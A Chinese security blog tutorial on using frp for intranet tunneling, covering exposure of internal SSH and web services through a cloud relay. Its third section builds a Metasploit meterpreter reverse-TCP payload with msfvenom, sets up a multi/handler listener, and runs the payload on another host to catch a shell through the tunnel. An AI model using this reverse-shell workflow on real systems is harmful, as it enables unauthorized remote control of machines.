Frp内网穿透

最新推荐文章于 2023-10-26 16:59:09 发布
最新推荐文章于 2023-10-26 16:59:09 发布
阅读量1.4w 收藏 65
点赞数 5
分类专栏: 内网 web安全 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45213577/article/details/120464751
版权

Frp内网穿透

​ 内网穿透从本质上来讲也是端口映射,两者都是将内网地址映射到公网可访问的地址,而区别是端口映射直接在路由器中配置即可,而内网穿透配置的端口映射则需要客户端和服务端进行绑定后实现,相当于客户端和服务端之间建立了一条隧道,然后访问服务端的请求会通过隧道转发给内网主机,该情况多用于没有公网 IP 的情况下使用;

​ frp是一个高性能的反向代理应用,可以轻松地进行内网穿透,对外网提供服务, 支持tcp, udp, http, https等协议类型,可以将内网服务以安全、便捷的方式通过具有公网 IP 节点的中转暴露到公网;

## 中文文档地址:  
https://gofrp.org/docs/ 
## github 下载地址:  
https://github.com/fatedier/frp/releases

​ Frp有客户端和服务端,根据所安装主机的系统下载好对应的版本,这里下载了两个版本,一个windows版本,一个linux版本;

1

1、映射内网SSH服务

​ 将linux版本文件通过xshell上传到云服务器,并进行解压;

## 解压文件
tar xf frp_0.33.0_linux_amd64.tar.gz

Snipaste_2021-09-24_17-17-59

## 文件涵义
frpc			客户端程序 
frpc_full.ini	客户端完整配置文件 
frpc.ini		客户端简易配置文件 
frps			服务端程序 
frps_full.ini	服务端完整配置文件 
frps.ini		服务端简易配置文件

​ 查看简易配置文件,配置了侦听端口为7000,即服务端与客户端通讯的端口;

Snipaste_2021-09-24_17-38-18

​ 启动服务端程序;

 ## 以简易配置启动服务端程序
 ./frps -c ./frps.ini

Snipaste_2021-09-24_17-53-58

​ 在本地CentOS7中解压linux版本文件,并修改客户端简易配置文件frpc.ini;

Snipaste_2021-09-24_17-51-54

## 客户端简易配置文件frpc.ini
[common]
server_addr = 123.456.789.111     ## 远程云主机的公网ip地址
server_port = 7000                ## 服务端侦听的端口
[ssh] 
type = tcp 					## 协议类型					
local_ip = 127.0.0.1 		## 本地的ip地址
local_port = 22 			## 本地的端口
remote_port = 6000 			## 映射到服务端的端口

​ 启动客户端程序;

## 以简易配置启动客户端程序
./frpc -c frpc.ini

Snipaste_2021-09-24_18-11-58

​ 此时云主机上服务端会显示已经成功的日志信息;

Snipaste_2021-09-24_18-13-29

​ 在云主机上查看6000端口的状态,显示已经配置了TCP监听;

Snipaste_2021-09-24_18-22-33

​ 通过xshell访问云主机公网ip的6000端口就可以访问内网主机;

Snipaste_2021-09-24_18-38-51

Snipaste_2021-09-24_18-39-11

2、映射内网Web服务

​ 配置服务端的配置文件frps.ini,vhost_http_port为http服务访问端口,vhost_https_port为https服务访问端口,此处以http服务为例;

## frps.ini配置文件
[common]
bind_port = 7000
vhost_http_port = 8080

Snipaste_2021-09-24_21-36-24

​ 配置完成后启动服务端程序;

 ## 以简易配置启动服务端程序
 ./frps -c ./frps.ini

​ 更改客户端的配置文件frpc.ini;

## frpc.ini配置文件
[common]
server_addr = 123.456.789.111   ## 云主机的公网IP
server_port = 7000				## 服务端绑定的端口

[web]
type = http
local_port = 80					## 本地Web服务的端口
custom_domains = www.yourdomain.com	 ## 解析到公网IP上的域名

Snipaste_2021-09-24_21-39-08

​ 启动客户端程序;

 ## 以简易配置启动客户端程序
 ./frps -c ./frps.ini

Snipaste_2021-09-24_21-40-44

​ 服务端可以查看到成功链接的日志信息;

Snipaste_2021-09-24_21-42-28

​ 访问域名:8080就可以访问本地的Web服务;

Snipaste_2021-09-24_21-44-17

3、配置MSF接收来自公网的shell

​ 服务端配置文件不用改变,修改客户端配置文件即可,然后启动客户端程序;

## frpc.ini配置文件
[common]
server_addr = 123.456.789.111   ## 云主机的公网IP
server_port = 7000				## 服务端绑定的端口

[msf] 
type = tcp 
local_port = 4444 		## 本地待监听端口
local_ip = 127.0.0.1 
remote_port = 8085 		## 云主机映射端口

Snipaste_2021-09-24_22-11-30

Snipaste_2021-09-24_22-19-10

​ 生成 payload ,LHOST 指定为公网 IP,LPORT 指定为公网映射端口;

## 使用msfvenom生成payload
msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=123.456.789.111 LPORT=8085 -b "\x00" -f elf -o xuyu

Snipaste_2021-09-24_22-26-24

​ 本地启动 MSF 并配置侦听,此时监听LOST为本地ip地址,LPORT为frpc.ini配置文件中本地的端口;

## MSF配置本地监听
use exploit/multi/handler 
set payload linux/x64/meterpreter/reverse_tcp 
set LHOST 192.168.1.105
set LPORT 4444 
exploit

Snipaste_2021-09-24_22-41-48
​ 将payload复制到另一台Centos中,并执行;

## 复制payload并执行
scp xuyu root@192.168.1.6:/root/
chmod +x xuyu
./xuyu

​ MSF 成功接收 shell ;

YeYingSec
关注
  • 5
    点赞
  • 65
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
【瞎折腾日常】frp实现内网穿透全过程
全糖少冰我吃不了苦
06-05 99
【代码】【瞎折腾日常】frp实现内网穿透全过程。
内网穿透工具frp原理和使用教程
weixin_43866043的博客
04-23 1万+
内网穿透frp原理和详细流程
使用FRP实现内网穿透
kcloud
05-03 9536
使用FRP实现内网穿透,远程访问内网服务器
【计算机网络相关】内网穿透介绍以及使用FRP实现内网穿透Windows远程桌面
Chaos的博客
12-04 9522
内网穿透介绍以及使用FRP实现内网穿透Windows远程桌面。利用内网穿透技术,将内网的一些设备的数据包进行转发,从而实现公网环境访问内网的设备。公网服务器充当的是一个数据交换的作用,我们访问公网IP,然后公网服务器将我们访问的数据转发到内网设备的IP,内网设备将数据在转发给公网服务器,公网服务器将数据转发给本地客户机,从而实现内网穿透,在任何地方访问内网设备。
frp 内网穿透 多系统 多模式(详细+多个应用)
ziqibit的博客
03-13 2万+
frp内网穿透的跨平台,多模式(包括点对点)的超详细教程,可直接复制使用
frp开源工具,实现内网穿透(详细教程)
热门推荐
qq_40903527的博客
03-30 2万+
frp内网穿透方式,简单几步就能实现外网成功访问
frp内网穿透服务使用
斧头湖懒客
07-22 1万+
frp是一个专注于内网穿透的高性能的反向代理应用,支持TCP、UDP、HTTP、HTTPS等多种协议。可以将内网服务以安全、便捷的方式通过具有公网IP节点的中转暴露到公网。frp是一个开源的内网穿透应用,有客户端软件和服务端软件,大概工作过程如下服务端运行在具有公网IP的服务器上,比如Linux上,并监听某个端口,等待客户端连接。客户端运行在需要穿透的内网机器上,比如本地电脑上,连接到服务器之后,服务器开始监听客户端需要穿透的指定端口。........................
frp内网穿透window版本,只支持windows系统
04-27
**frp内网穿透原理与应用** FRP(Fast Reverse Proxy)是一款轻量级的内网穿透工具,由Google员工“k8s-gubernator”开发。它主要用于帮助那些部署在内网或没有公网IP的服务器提供对外服务的能力。FRP的工作原理...
frp内网穿透
01-09
内网服务器 – 客户端 frp 二、 frp下载 frp下载地址 https://github.com/fatedier/frp/releases linux平台下载的版本为:frp_版本号linux_amd64.tar.gz 解压 tar -zxvf 文件名 文件解压后: frps(frp服务端运行文件)...
frp内网穿透工具 v0.54.0.zip
最新发布
03-21
**frp内网穿透工具 v0.54.0.zip** 是一个包含了最新版本的Fast Reverse Proxy(简称frp)的压缩包。frp是一款强大的内网穿透工具,由Golang编写,允许用户在内网环境下,通过一个公开的服务器访问内网服务,实现了...
frp内网穿透客户端服务
11-20
【标题】:“frp内网穿透客户端服务” 【正文】: frp(Frondend Reverse Proxy)是一款轻量级、高性能的内网穿透工具,由Golang编写,旨在帮助那些处于内网或防火墙后的服务器提供对外的服务。通过frp,用户可以在...
frp内网穿透工具,附自动拉起脚本
10-24
frp内网穿透工具,附frp服务端、客户端自动拉起脚本。 支持TCP,UDP,HTTP,HTTPS等协议类型。 适用情况:实现内网服务通过端口映射的方式暴露在公网环境里。要求:有一台有公网IP的服务器。
frp内网穿透原理及配置应用
u013568040的博客
09-07 9042
1 Frp介绍 frp 是一个专注于内网穿透的高性能的反向代理应用,支持 TCP、UDP、HTTP、HTTPS 等多种协议。可以将内网服务以安全、便捷的方式通过具有公网 IP 节点的中转暴露到公网。 frp 项目官网 https://github.com/fatedier/frp 中文文档 https://github.com/fatedier/frp/blob/dev/README_zh.md 客户端和服务端 https://github.com/fatedier/frp/releases 2 准备工作
一文拿捏内网穿透利器之frp(反向代理软件相关)
ITSM/ITIL/网络安全/IT运维
10-26 3390
简单地说,frp就是一个反向代理软件, 它的作用是将内网中的服务器暴露到互联网上, 它体积轻量但功能很强大!!!通过它我们可以很方便实现内网穿透功能!!!它其实有两个服务:客户端frpc, 安装在我们内网中某台物理机上服务端frps, 安装在一个公网服务器上如下图:首先公网上先部署了frps服务, 并设置了连接端口然后在内网中运行frpc服务, 启动时会连接到公网上的frpc服务, 并保持保持住这个长连接(如果断开了会进行重试)
手把手教你用frp内网穿透
Small丿Rain丶
11-01 3718
使用docker安装frp内网穿透
frp实现内网穿透
qq_34748010的博客
02-17 722
由于工作需要,经常会在家访问公司服务器,之前使用花生壳、TeamViewer,不是限制流量就是限制使用次数,后来发现了frp内网映射的方法。只需要一个公网ID,并通过简单的配置,就可以轻松访问公司内网环境下的电脑了。
shell中 >/dev/null 2>&1
黄亚的博客
09-28 731
shell中>/dev/null 2>&1 1. /dev/null 这条命令的作用是将标准输出1重定向到/dev/null中。/dev/null代表linux的空设备文件,所有往这个文件里面写入的内容都会丢失,俗称“黑洞”。那么执行了>/dev/null之后,标准输出就会不再存在,没有任何地方能够找到输出的内容。 2>&1 这条命令用到了重定向...
内网安全——穿透上线Ngrok&Frp&Nps&Spp
m0_61506558的博客
01-30 3450
nps是- -款轻量级、 高性能、功能强大的内网穿透代理服务器。目前支持tcp、udp流量发,可支持任何tcp、udp. 上层协议(访问内网网站、本地支付接口调试、ssk方问、远程桌面,内网dns解析等等) ,此外还支持内网http代理、内网socks5代理、p2p等,并带有功能强大的web管理端。GitHub - ehang-io/nps: 一款轻量级、高性能、功能强大的内网穿透代理服务器。
frp内网穿透内网linux
10-07
frp是一种内网穿透工具,可以通过frp客户端和frp服务器将内网服务映射到公网上,从而实现在公网访问内网服务的功能。内网穿透的原理是通过frp客户端将内网的请求发送给frp服务器,再由frp服务器将请求转发到公网,最后响应结果返回给frp客户端。在linux系统上进行frp内网穿透的步骤如下: 1. 在linux系统上下载并解压frp文件,可以使用以下命令: ``` wget https://github.com/fatedier/frp/releases/download/v0.42.0/frp_0.42.0_linux_amd64.tar.gz tar -zxvf frp_0.42.0_linux_amd64.tar.gz mv frp_0.42.0_linux_amd64 frp ``` 2. 进入frp目录,可以使用以下命令: ``` cd frp ``` 3. 配置frp客户端的配置文件frpc.ini,根据需要设置需要映射的内网服务和对应的端口。配置文件示例: ``` [common] server_addr = frp服务器地址 server_port = frp服务器端口 token = 认证密钥 [ssh] type = tcp local_ip = 内网服务IP local_port = 内网服务端口 remote_port = 公网访问端口 ``` 4. 启动frp客户端,使用以下命令: ``` ./frpc -c frpc.ini ``` 通过以上步骤,你可以在linux系统上成功搭建frp内网穿透

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

YeYingSec

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值